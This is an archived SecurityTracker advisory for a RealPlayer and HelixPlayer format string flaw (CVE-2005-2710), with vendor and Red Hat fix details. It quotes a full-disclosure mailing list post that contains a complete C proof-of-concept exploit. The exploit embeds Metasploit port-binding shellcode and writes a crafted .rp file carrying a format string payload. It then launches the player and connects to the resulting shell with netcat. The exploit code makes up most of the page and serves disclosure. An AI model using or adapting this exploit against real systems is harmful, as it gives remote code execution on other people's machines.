SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   RealOne (RealPlayer) Vendors:   RealNetworks
RealPlayer for Linux/UNIX Format String Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1014974
SecurityTracker URL:  http://securitytracker.com/id/1014974
CVE Reference:   CVE-2005-2710   (Links to External Site)
Updated:  Sep 27 2005
Original Entry Date:  Sep 27 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 10.0.5.756 Gold
Description:   A vulnerability was reported in RealPlayer for Linux/UNIX. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted '.rp' file that, when loaded by the target user, will trigger a format string flaw and execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

HelixPlayer is also affected.

c0ntex reported this vulnerability.

Impact:   A remote user can cause arbitrary code to be executed on the target user's system with the privileges of the target user.
Solution:   The vendor has issued a fixed version (10.0.6), available at:

http://www.real.com/linux

Red Hat has issued a fix for Red Hat Enterprise Linux 3 and 4:

https://rhn.redhat.com/errata/RHSA-2005-762.html

Vendor URL:  www.real.com/linux (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Sep 27 2005 (Red Hat Issues Fix) RealPlayer for Linux/UNIX Format String Bug Lets Remote Users Execute Arbitrary Code
Red Hat has released a fix for Red Hat Enterprise Linux Extras.



 Source Message Contents

Subject:  [Full-disclosure] RealPlayer && HelixPlayer Remote Format String


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER          10000
#define EBPMSB          64105
#define HOST            "localhost"
#define NETCAT          "/bin/nc"
#define NOPS            0x90
#define STACKPOP        148
#define VULN            "/usr/local/RealPlayer/realplay"

char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
                "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
                "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
                "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
                "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
                "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
                "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
                "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
                "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                "\xe1\xcd\x80";


int
filegen(char *shellcode)
{
     FILE *rp;

     printf("[-] Creating file [%s]\n", filename);

     rp = fopen(filename, "w");
     if(!rp) {
           puts("[!] Could not fopen file!");
           free(shellcode);
           return(EXIT_FAILURE);
     }

     printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with
value [%d]\n", STACKPOP, EBPMSB);

     fprintf(rp,
                     "<imfl>\n"
                     "<head\n"
                     "duration=\"1:33.7\"\n"
                     "timeformat=\"dd:hh:mm:ss.xyz\"\n"
                     "preroll=\"1:33.7\"\n"
                     "bitrate=\"1337\"\n"
                     "width=\"69\"\n"
                     "height=\"69\"\n"
                     "aspect=\"\"\n"
                     "url=\"http://www.open-security.org\"/>\n"
                     "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
                     "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
                     "</imfl>", EBPMSB, STACKPOP, shellcode);
      fclose(rp);

      free(shellcode); shellcode = NULL;

      return(EXIT_SUCCESS);
}


int
main(int argc, char **argv)
{
     char *shellcode = NULL;

     puts("\nRemote format string exploit POC for UNIX RealPlayer &&
HelixPlayer");
     puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's
latest version");
     puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

     shellcode = (char *)malloc(BUFFER);
     if(!shellcode) {
           puts("[!] Could not malloc");
           return(EXIT_FAILURE);
     }

     memset(shellcode, NOPS, BUFFER);
     memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
     shellcode[BUFFER] = '\0';

     filegen(shellcode);

     puts("[-] Completed creation of test file!\n[-] Executing
RealPlayer now...");

     switch(fork()) {
            case -1:
                    puts("[!] Could not fork off, bailing!");
                    return(EXIT_FAILURE);
            case 0:
                    if(execl(VULN, "realplay", filename, NULL) <0) {
                            puts("[!] Could not execute realplayer... :(");
                            return(EXIT_FAILURE);
                    }
     }

     puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO
HIT RETURN ON REALPLAYER WINDOW **");
     sleep(10);

     if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
            puts("[!] Could not connect, check the core file!");
            return(EXIT_FAILURE);
     }

     return(EXIT_SUCCESS);
}


--

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC